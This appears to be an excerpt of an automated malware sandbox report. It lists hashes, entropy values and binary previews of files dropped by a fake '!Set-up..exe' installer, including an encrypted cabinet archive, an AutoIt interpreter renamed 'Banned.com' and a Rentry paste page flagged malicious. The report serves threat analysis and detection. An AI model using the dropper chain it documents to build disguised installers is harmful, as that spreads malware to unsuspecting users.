                                                            MD5:CE605A59DE6379BA8DFAB762376A82DB
                                                            SHA1:0E8D74F537E58AD09E08FB0AF0C2151FD91B953C
                                                            SHA-256:81B6C9D8C798EEB2254ADE6E6A562C55F150198F97B25E550E4740594B679499
                                                            SHA-512:1DBC8184FFC8B5B90F6DEB2BF002364AECDDD779079A349EA875C73AC14BB63A482E23B7E2D201251CFF220081C0D1D069C826E638E9DA0EACCEEC723B867888
                                                            Malicious:false
                                                            Preview:....t.3.PPPhLyL...3.f9.t-3.WWW.u....u.WWW..t.hhyL...WWWhLyL...h.yL...M......_^[..U....SV..M.W.^.S....3...t1W...lq...O..M.f.8.t.W...Xq...M....P......M...;.r.E.;.t.P.......M..f..._^[..U..QQVW3...WWj.V....I..E.Ph....j.WWj.V..X.I...u+.E.PV..h.I..u.Wh........I...WV....I.V..`.I._^..U..SVW..3.3.9W.v3.]....3.f..t......P.E....f9E.t.A...Kf..u....BF;w.r..._^[].......U..QSVW.....tW...u.W....Y.p.3.PPVWj.P....I....t33..j.Z;.|............Q.D...YSPVWj.j..E.....I..E...3._^[..U...(SVWj..M..}.Y.. K....j0Xjxf..}.f..Xf.C..W...x1.}..r..4....:...........f.DE.f.F.f.DM.f...v.y.}.3.f.D.._^[..U....SV..3.W.}...U.C..7.w....wA3.u.A.M...~0.u......QRP.*.....M..W.F.E..U.........E..M.;.|....2._^[..U....S.].VW....W..P.I.f.>...Y...V.|V..Y.....I....}........j..E.VP.....3.f.E..E.P.o...4^f.....V.>V........rhj..E.VP....3.f.E..E.P.o..f.G...]......V..V........r2j..E.VP.|...3.f.E..E.P.So.....f.G.V..U.......t..4^V..U..Y.........j..E.VP.:...3.f.E..E.P..o...4^f.G......]....V.U........rWj..E.VP.....3.f.E..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ec

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:Microsoft Cabinet archive data, 488845 bytes, 11 files, at 0x2c +A "Fwd" +A "Designed", ID 6536, number 1, 29 datablocks, 0x1 compression
                                                            Category:dropped
                                                            Size (bytes):488845
                                                            Entropy (8bit):7.998691987840986
                                                            Encrypted:true
                                                            SSDEEP:12288:XwvCK7QeZkkSjho8hd9kv+25MbW92VDfG4448L29:XEyBW8Nkv35MSYVTxPwA
                                                            MD5:AFA0F6F9328F080270E89AFFF0581506
                                                            SHA1:1C607C64FCA1CDB4E75DBFF2788F7C3B09D21EA6
                                                            SHA-256:40E274B995FF6326EB0F89943CF999743AE9BDA9F314B3D775F62EC71A5F51C2
                                                            SHA-512:1BE681C4CBA19297FA8D4C7339BD6C7F9E76098AFAC72B9283739DEC20B1A1F1444C71AD94BD29654E20E2CB788189969357CF9FF4284EBCB2A5958BCF166274
                                                            Malicious:false
                                                            Preview:MSCF.....u......,...................(..................Y(. .Fwd..8.........Y(. .Designed..0.........Y(. .Balanced............Y(. .Dir............Y(. .Writing............Y(. .Rise..4.........Y(. .Soccer......,.....Y(. .Returning.....]0.....Y(. .Available.....]......Y(. .Ford.....]......Y(. .Race..h...T..CK..\TU..~...U..`TX.c.j-9Z.h.2....2#)...4...$m".Q..Q{...2.]..u.M..@\.r..-.+.l.C....h..>.s..}.......=....9.<..u.sF......$. U=p].$.oMRYK.j..Kq....TU...0.......L8J..b......C);.lER1..1..........F...B....H..%4...j....!.o0a..p...c7&,...3f.....d{.S..Z.{......(Z...H.#.1.._.0g.s.3.`.^mp..1.RY.......d^.&~.(I.U.L.'...PRL..!i...Y."J....$..$..&..q#%.k..x.,...>|......H..T..E........}z.W...&.~.$.......;y..Ez.KR..2....T...-9._.....T.M^m.bR7R..._..n>...xa.$...'.$aU1..y.....@..,.....?m....*...zdA&.....uV.Ka.4..`>...{I.!.d......[M.7..r.k>s..k.s-f.......$.....A;l_=..}.%...R|l..p.@.......U.Y..)xZ..Ru{...?....G.>...`.VR.......AX.!D.z..CX.6.....g)|..(|.........C8z....vA..[.....

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ford

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):117760
                                                            Entropy (8bit):5.977012621747547
                                                            Encrypted:false
                                                            SSDEEP:1536:OxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ22:OxjgarB/5elDWy4ZNoGmROL7F1G7ho22
                                                            MD5:D036147EA7B09A642723D8811105937D
                                                            SHA1:276CC8C1DDA5D55F549E053522F95CEE037F6B9D
                                                            SHA-256:DC830AFFB9D9B2E23293BEDA376AD0BDA96CDFF3670CD10ACD131FDCC795855E
                                                            SHA-512:B23E9E6A86720D1E37399916F66A13612CA570884D84F89383563E30479C37F6D48FB0859220F027E68A29D568B5AF78360112C06EE89BA347145E9AB48F3CF5
                                                            Malicious:false
                                                            Preview:..F...N...d...z....................................".......:...N...h...x.................................... ...4...P...b...t.........................n...............*...>...T...p....................................(...@...P...^...t................................&...B...`............................. ...8...J...\...r..................................."...*...@...N...Z...n............................V...J...:...*........................................................*...<...V...l...x...........................................(...2...D...V...f...x....................................... ...2...D...^...x..................x...^...H...2....... ...........................................'...........%...).......................................M...&...........................................h...R...>...(....................................... ...6...F...V...h...v....................................,...:...J...V...b...v.......................................*.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fwd

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):109568
                                                            Entropy (8bit):6.268600966580074
                                                            Encrypted:false
                                                            SSDEEP:3072:GZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3lap:GK5vPeDkjGgQaE/lS
                                                            MD5:CD16A7A04781F568A2EC3AC1A39FED9C
                                                            SHA1:37096520C4625AA474494B9C2A10BF31DE8B673D
                                                            SHA-256:5863794AC1CC6542B2BEE5E8A5CF372C386DB7F2840295B902B1E3B88751A9B6
                                                            SHA-512:6FB5658A18742FE5428A89E06E7EC0B3AE07658329CDA5FB8F0801356648D992A9C11F9E26D2468E7153665C8F3D626151256336617037B7B5F6BF3B0ED6777A
                                                            Malicious:false
                                                            Preview:.......................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Hall

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):79872
                                                            Entropy (8bit):7.997843169471513
                                                            Encrypted:true
                                                            SSDEEP:1536:SohxbClN1Bzx9wpidSop7s9FJ8ejlM+wd/zJP7vxugTGMOZ1e:SoraBzPPdS/9XfwpzJP7Jugqj1e
                                                            MD5:CC9CC6F20A1EA21EA470B504FDE0F90C
                                                            SHA1:1E7AFADF12F7A09A68C93BA813C64C2C9B225E71
                                                            SHA-256:2F9D2D953CCFEDDD5DEC2DF0BC5134F002F44F31715BD812F81875CDF6B550A6
                                                            SHA-512:64C4E6ED40C401BF82ADE85189E7E862F7817965F2739FB7C93B7C2A6FD4B4959585BAF05EEB1E4A21E5F665E64709C3FA670AAE5CA1EE2B7927E7FE1E4D3824
                                                            Malicious:false
                                                            Preview:B....L1....=...g...........P.... @....p.,.-..NgP....k....+b...q6I.W.h.3...._z.E.....Ny.P00......4..v.OGE..N_.,.*Q\_m..w.K.....Avb..QW....)>...]..E...#.>..}.......Z/...._...(b.f..F..D......|j.87.....UT.m<....lA.n Ux......7...4...!L....Ie...nC..i.}..#....NS.;.U...|.jO...........1.(..!.......n .."...T.t....Y.X.H......350K...wla.e...d......<.J`.{.]b......O%.S..|r...o'Z.|.E.>.u.......Gm.9.2o^r.Lc.9...I4.K.q.^*......"L.X.`|.1..1.B-.^G`.(FO+..#s.2..V...W.e&....8.L.,|.?....?.+.......-..}.!(@$F./....7..(I.-v...x....z.F......ZO..t...+1......o@.*..s_.Ve.IUK...a. .A..Q:.e_.Kn.R[>W.@.....5...^...g.......h9.|......%.g....+....K._(2............t.R..^.Q.BR...%....8=.Z....i<Py....c..... P_.'..h.*...A].wi\..Z... .K......1....a...c..1.3....lJ=...@.Rc.on...W.o.....a.R0....m*|(o.c...|....GT.ga.....J..e..`......S\..f...D.}..z>9.....D....H..[7> ....3............'=:G..S$qOI.?.....pCg..25.')y...P....s....;.9v.%5..n;.%-..Te...Z..&.....D..!............0b..,...Y....^..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Race

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):105472
                                                            Entropy (8bit):5.077087329848572
                                                            Encrypted:false
                                                            SSDEEP:768:xhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUs6:eaAwusPdKaj6iTcPAsA+
                                                            MD5:B99AD1F5C7742F52686D2508FD00982A
                                                            SHA1:7B0449CADAF6A2A28DBF7E65FD45A1FD12EDDB48
                                                            SHA-256:AC58BF2BC9334DD912148161F79DC611A7326465CF959F7374F387E8AFC61B42
                                                            SHA-512:78397576FA9CD90C7B8EA8ECE2F5B31887F5E5EB6D5A3C6FB69E4BA2554B14286142D68DB2F6DEEC4C21AD28B8148A89494154F65CE36F24EEA793EB3D96F472
                                                            Malicious:false
                                                            Preview:......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!...~...!...+*..!...]...!...(*..!...?*..!...=...!...E...!...G...!....*..!....*..!....*..!.......!...2...!...3...!...6...!...5...!...O...!...K...!...1...!...(...!...D...!.../...!...-...!....)..!...A...!....)..!...+...!...*...!....)..!...&...!...*...!.......!...'...!.......!...%...!.......!...................................t.......................................................t.......&.......%.......@.......?............... ......" ......; ......& ....... ......3 ....... ....../ ......7 ....... ......+ ......C ..............................".......;.......&...............3.............../.......7.......................+.......C...............................".......&...............+......./...............................3.......7.......................&.......;........................~.......P....... .....................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Returning

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):895
                                                            Entropy (8bit):3.529004704992108
                                                            Encrypted:false
                                                            SSDEEP:12:oLOyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:oiyGS9PvCA433C+sCNC1
                                                            MD5:9FA6250AC33B492A0812FC44C12A8A0C
                                                            SHA1:B4277E0D18E4FDB16B4437F0803BB6E04438A162
                                                            SHA-256:26A3D1D787256EDD456A7E86452AD615AD8AEA98C58F8ECEA9EE4978F62D02DE
                                                            SHA-512:FFE0CD06A9BD86E673A0D92E3C7FB87A2E50A80B40C4716EE224264F9BE8A4E32F78E86F38E38156AD40CA8D987537CB65B9B9DDA86BFEF2FDBB9AD0CB836E52
                                                            Malicious:false
                                                            Preview:Ratio........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Rise

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):62464
                                                            Entropy (8bit):6.691860814252206
                                                            Encrypted:false
                                                            SSDEEP:1536:82U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvYd:82UDQWf05mjccBiqXvpgb
                                                            MD5:85667E167580AB6EE879A397EC8378D5
                                                            SHA1:3C22100369DD7E9FC15788182A7647CC18A12EC8
                                                            SHA-256:FAB0E8057B43711FDCF24AB3BB355B5CBC3F3D37782E598BF4925AB58E602E74
                                                            SHA-512:398C52BEC5B244353715BC4A044415DB5A542BB9EF8C98D4C425BAEA55E2BDC0946753C5AE1775A950FB1FC2F2F3119243178D58F3230873A77086BB4FFF31D4
                                                            Malicious:false
                                                            Preview:f;E.u...u4IG..f..A..v...f;E.t.f;E.t.f;E.u...._^[..F.r...N.l.....t...U..QQV...E.....3..E.W....tn.....FP.P...Y..ua..3.S.]....V....+tVH...tLf9.Vt....VP.h...Y..t.k.....E.....V.....B..3...f9.Vu....M..E...[_^..2......M..B...U..Vj.....D..Y.u........F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...V......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...H..._^[.....P0.P0.P0.P0.@0..j.h.....:...U..Q...SVW.13.....M.x>..>.+....S..s...0.u......YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V...(..j.V.=C..YY..^...U..V..W.F...........}.S..........j.[9_...4..................[.N.....4..._..^]...U..QSVW...G...................u?.u..~....O...j.Y9N..........6........../...O..........._^[.......................M...U..QQV..~..t..y......]..'...E....F.....^..U....SVW..M.h..I......u..F....x........j8..B......$.....'..>B..Y..G..c....O..#......T....F..0...]..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Scout

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):7.996655669830848
                                                            Encrypted:true
                                                            SSDEEP:1536:VklthqG33QEqywJCsrUvekJ9dVLw45uRY4hUfrR:V23AEVwEfJ9XLw45riUfrR
                                                            MD5:76D9165FFF95E5302786C486398E284B
                                                            SHA1:ABE552EE6A06100D96AEFC6F2AF6E189AA766227
                                                            SHA-256:1B5A2E903DEC1BD0620E473D0DFF69761ACF5E375EAC1ED87ADF76F36F2386A3
                                                            SHA-512:6CC547E452FDA1A60FBFB016027791788B23C3591114D7800B244ABA620717DF5A72B5CA1C98AA1355CA2C8B0E7395C04EC072DB9606540051FD99B1846FB198
                                                            Malicious:false
                                                            Preview:.N...9.yHi..>..d.W.Xd8.r..M...%.*|.......ig.]}>...l.T..d.7.6..$..L.......Gv5.1._x...1l..X....y....>...9.B%{...ZZ..y.K}...=..l..]..T.....o.j..t.q....B..H...|n).KY.5..U.u.B..!.Z.*.....z(|.B.zz8..N.M....0)FF[R.32A..n...W/........!..+Q..{S.:07:.c|.\NK..R.!.v_...Ye.J.lPg..=mju....".`.....X.|.)Np..p..S......Q.`.OT..A..&....>........,..'......4$.x.c|.].D..=*..&+#D...~g...%q....V..........v`..E.~.q..}}r...wi...iB uG..T..[.|%.#-.XG^....ED.....u:*.vOP.:.....`>{.:....+q..}.....pz..Ct..6-.I...a].D.c.....V.0...=}sQ.ig..!A...."k.f.D..G....&.&.Q..+.M.....`.O....s...._Q..j.x...9.ld.....G9......<W.[.Bi...6....+I+W....0R6d.jh?..qe.......a..k.".....__....$..3..<........C}..l...a..=Xf..?.2"..V..d....+02..s.s(L. *7...W*..5Yj)bZ.T..S..Q........D.7IzZ~f7.uy.9k+.....>.^...}%....;.Vc.!.-.0..T...j..E.....HP;..-=H.Z...f.J.*Z...i?...l..?A..i.a.`LFo.w...JU..a .6.l.O....G.........Y..K.....X..+..D...A$....^.`..).2j,...+*.-$.}.G....H.w.<.. ....a qR.....?.[..S.%JE.6

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Soccer

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):144384
                                                            Entropy (8bit):6.466063523256831
                                                            Encrypted:false
                                                            SSDEEP:3072:PDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbI:GO5bLezWWt/Dd314V14ZgP0JaAOz04pC
                                                            MD5:57B6E79E7402D37A0B83CFF2DB1D0273
                                                            SHA1:8805DF3CABF590F92B2ECB7EFAE60D82F14F0B6F
                                                            SHA-256:8DF20B2B819AA0C6E36877BA7063FED41274B988C46C28EC7E4B3C72584EC2E7
                                                            SHA-512:49EAFE0D09F850C52006C3DF4DD58E2D4CE1D6AA22AA7A378D6345AB6FE7C92987E134E4C486DEF75E6B0219D867AE1229AA828440C5624EF8C93C7CC1E79DAF
                                                            Malicious:false
                                                            Preview:...Pj..t$\Q....I...tF...@..|8...L8.t..I8.A......|8...L8.t..I8.A...|$.........t$.....I......C..L$$3.SSQS.L$0Q.t$<.H.....HP.t$0....I...t(...@..L8.8\8.t..I8.I...L8.8\8.t..I8.Y....M..D$(P..M....S.t$(.H....(....t$..5..I...9\$.t..t$...L$P......L$0.%....L$@......D$,.(.u.j.P.8...t$0..8....._^3.[..]...U......LSVW.}...h..I....B....L$8.....L$(.....L$H.....E..@..0........N..........A..B..A..B..A..B....D$XP.D$<P.D$PP.....D$(.......D$<.A..D$@.A..D$D.A....D$0P.D$,P......u1...@..|....L..t..I8.A......|....L..t..I8.A...l...3..D$.9D$<t].D$.P.t$..t$@..$.I...t@j.P...H.........H..|....D..t..@8.@......|....D..t..@8.@........L$....L$..D$.P.D$$.....P3.P.t$TQ....I...tRj.P...H....O....|$..t..t$.....I....@..|....L..t..I8.A......|....L..t..I83..A......E..@..p....K....F..L$.Q3.L$ RQR.0.t$$.. .I...j.^..1...t6j.P.......H..|....D..t..@8.H...|....D..t..@8.@.......3.P.t$ ....D$.........j.Z;............h...;..........t`..........E..D$......@..p........D$.P.D$$P3.PP.F..0.t$$.. .I..]...t$ .|$$.A...j.X

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Throat

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):71680
                                                            Entropy (8bit):7.997185886941614
                                                            Encrypted:true
                                                            SSDEEP:1536:bvgT0gwThL3g9hMNG6HNnBAcmSJU3VXkxf3nZ9rY47K0qMLE9S7f:bvgABhL32wHNn6cBgX+brY47K0qqtf
                                                            MD5:34BE2CF79F42494DB963EC85DA206D2E
                                                            SHA1:2713983B0B393CFF8E07630B1ABC107FE90BDC5B
                                                            SHA-256:7CFB013FACCD6086F660D5B46712EBACABF2A160A26E453A7B83D83412A16A11
                                                            SHA-512:47CD4E47A69059235607B95342E069CCD7C8E41F7D6D9E1DDC9BF5F93BC8C7A064A49EDC26ADC41CCD3F24B5515E965D3E9CAAC391D345D3D5209C6ADEDD61CB
                                                            Malicious:false
                                                            Preview:E#....p.C...d.....7%y.~0~.|...1....o.|.....}(..7...3.....8.0..|.....j$.e.....p......jn.W..U.hJ.Ei...}...B.Y.F.kt.E...n.H@*...O.G8...x.].^b.P.3....J..V.J...;.~.....0;.....`\"G...@;..t...Y........u.8.sY..d.b...1b..p...O....M KL3.TqH-J.k......\..f..%|p.k...-1._.M@ll.l..Z....W..?...w..*....V..t..2I.......V.Z....H.NPa.$.e7OE.1.._...^..........N.... (.PN....33.7......<"E!.E..........*."Q..;..C../............_m...H.j...\...O0&,Z.B..)..).H.8=.E.,..1...HCtGG.BC.*..3.="./...4z....r..q.kQx.DE.......u2;R....e.......%.t...v.B.X..8}... ..D.....g..H.........D...K.C..RPPgbtX*....A.%...E..s....8..MG(.....v..g.v,..J.v9.)cv.....y.n...N.n|...xE..&.%oz....W....E'/Y..............^...., V...5.k...dj.......}.9xP}\.R..S.q....L.t=.<...b. D...Q...<..',.v.I.....,.Cjq.....]f1.m.+..@...i_ {..J..T.:U....t>.&}..G..@.9....G.FH.K.Y...K(.".'#.......$.........urd.o}*..E..;..5.p...s..@../.w#...my......@....;......e...1.8.p..X..9.v.Q...I...O...._...d..&...N..{.hB....g....o...x.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\War

                                                            Download File
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):34424
                                                            Entropy (8bit):7.994339551631228
                                                            Encrypted:true
                                                            SSDEEP:768:VCFeeq+5DGzH8CfNr7GfSLnANmqrfy10Uy/hrMBohg9:VCFeeQBlr7GKzaXy0UyZrK
                                                            MD5:F0067E491667E285C6AA36CABB0934F0
                                                            SHA1:05F07BC57272ACEA6794F92726B6B05AC4BF41EA
                                                            SHA-256:7C27FA3805B5877F74A80274B3ACCFF8041CFCB5C8FF930DE5B93F49569A9C8E
                                                            SHA-512:FFDAD8684222F1E957A8E64DF94EE6DEA74BE948E8ABA9C759B5995B8337A9C1F363C1B098D32C393DC69D7470C9BA2E748E4D057F3FE89E6F4C99B02DE2F9AF
                                                            Malicious:false
                                                            Preview:.<]......].....F.`..E........!......Fz....`Ey.Z......c.........]...@...8..(..[.(..iR.G..*,...0.d......[...D32...x.=..7y;.=#..3{.:.Af.F.8,C:..b....[..<4....P..P....a.9?.l1D..A...JU8...T.kYXY.....U2...0...A..7<......;...jS.......}9_.....k.n....e.....Z...t<V.....Z...y...|1i.,........d.3...YN..[x. .y-.i.z.D........3..Q.......j..BH....C.....)zyg"..Y..[wG+..+..''`.9..5:Y{r.8H5..4.rXuC#F......g..._-.Z(.....,.>..P]..bD..2s........wU......5......5i..Xg..\%..*cr5e..+...(=./...-Z.y..M.@..@..;..9.Z:..j.......ju*..e;..#......X...t.S....5......Iva*...!...q..{..N.H.*.s...kYp...h9...>f.{%.}....|.....b}]...O...Rcm.K. q. 51...-.?....>.{.:.($...)E......h../f.R1...`.u.m`..o....=YmAV...mR(!.$.j$...9.~.C5.CZ...h. 4..r.."{.U..}Hb.s)._..q.j.3..Y.VI:...*..g.}...^.vY#....#.......r..)........9nnQ.-.'F....._.....Z.6......GN...[..E.z.R..g...D..z...........9W...(c\g.E.=..*5L..Uq....O0.....54.3....U3D..D..{...c..%......J.Rf...t.....Eg.....8|.Y.n.j#."..d.w....u..d.Y..S>.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Writing

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):7390
                                                            Entropy (8bit):7.597721493375944
                                                            Encrypted:false
                                                            SSDEEP:192:bH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:brVEVFJ8ZcGwGBk7/UMQ3rw
                                                            MD5:117FE1670C955271C9D468192301A43F
                                                            SHA1:46E5D4E2284C95B30D8D5C8C506A5376987B70A6
                                                            SHA-256:4C4FD142141A03A04B927A31F365DFB0ACD6F972340B109430AF367EAA2856ED
                                                            SHA-512:1BECFB8DDE3672C2A6FBD33BE641CD0E15852365AD2DEED41700F3C441BE90F691B564AE947813A04D19665E9B39AC17F73B1A7EFB54CE8B4821B0A25D2DCEF9
                                                            Malicious:false
                                                            Preview:d...H*}.)..f..+....";Y.}..#....). .%|.X.[.....tgo..!sN....9v.\...|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0...*.H......1...+.....7...0...+.....7...1.0...+.....7...0/..*.H......1". .g.6..l....#..t.X..n|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0...*.H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......|.aH|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&..*.b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0.....*.H..........0......1.0...`.H.e....0....*.H..............0.......+.....2..010...`.H.e....... .s....Y....8.z..^.....&.....2...M:BiRb.Sanz...M.....20220227153015Z0.....W.U0S1.0...U....BE1.0...U..

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.6599547231656377
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulRlltl:NllU
                                                            MD5:2AAC5546A51052C82C51A111418615EB
                                                            SHA1:14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
                                                            SHA-256:DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
                                                            SHA-512:1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
                                                            Malicious:false
                                                            Preview:@...e...........................................................

                                                            C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            File Type:HTML document, ASCII text, with very long lines (945)
                                                            Category:dropped
                                                            Size (bytes):5659
                                                            Entropy (8bit):5.059430887107316
                                                            Encrypted:false
                                                            SSDEEP:96:5puA5jKEcXrj7uDQgzQs4x3pBxu0knx/ICu:5p9pcXr2DFzd4x3pBIXnx/ju
                                                            MD5:697EB758D2A3D2C71F0857A9B7D0F526
                                                            SHA1:9BE1BE38EC1E38EF0D4F3C04A3BA3DC9A0958A41
                                                            SHA-256:CEA13B090B80DE98292B698298F6AC8CCA8FEDC5F3648FD737F01D28E4EF87AC
                                                            SHA-512:6BA18397D4107C46B4C096FFE2D487868E405619CE730E09C635F143C45CABC12A057A4F339986873C8ADF8D7854F3D830CE2FDA3FFD3354D273CD006AF6D7D3
                                                            Malicious:true
                                                            Preview:<!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>What</title>.<link rel="canonical" href="https://rentry.co/what" />.. .<meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and editing. Fast, simple and free.">.<meta name="keywords" content="paste, markdown, publishing, markdown paste service, markdown from command line">..<meta name="twitter:card" content="summary" />.<meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />.<meta name="twitter:title" content="Rentry.co - Markdown Paste Service" />.<meta name="twitter:site" content="@rentry_co" />.<meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />..<meta property="og:url" content="https://rentry.co/" />.<meta property="og:title" content="Rentry.co - Markdown Paste Service" />.<meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />.<meta p

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsfhqslw.j5h.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpy2jjsb.w4i.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):4.9564593876511305
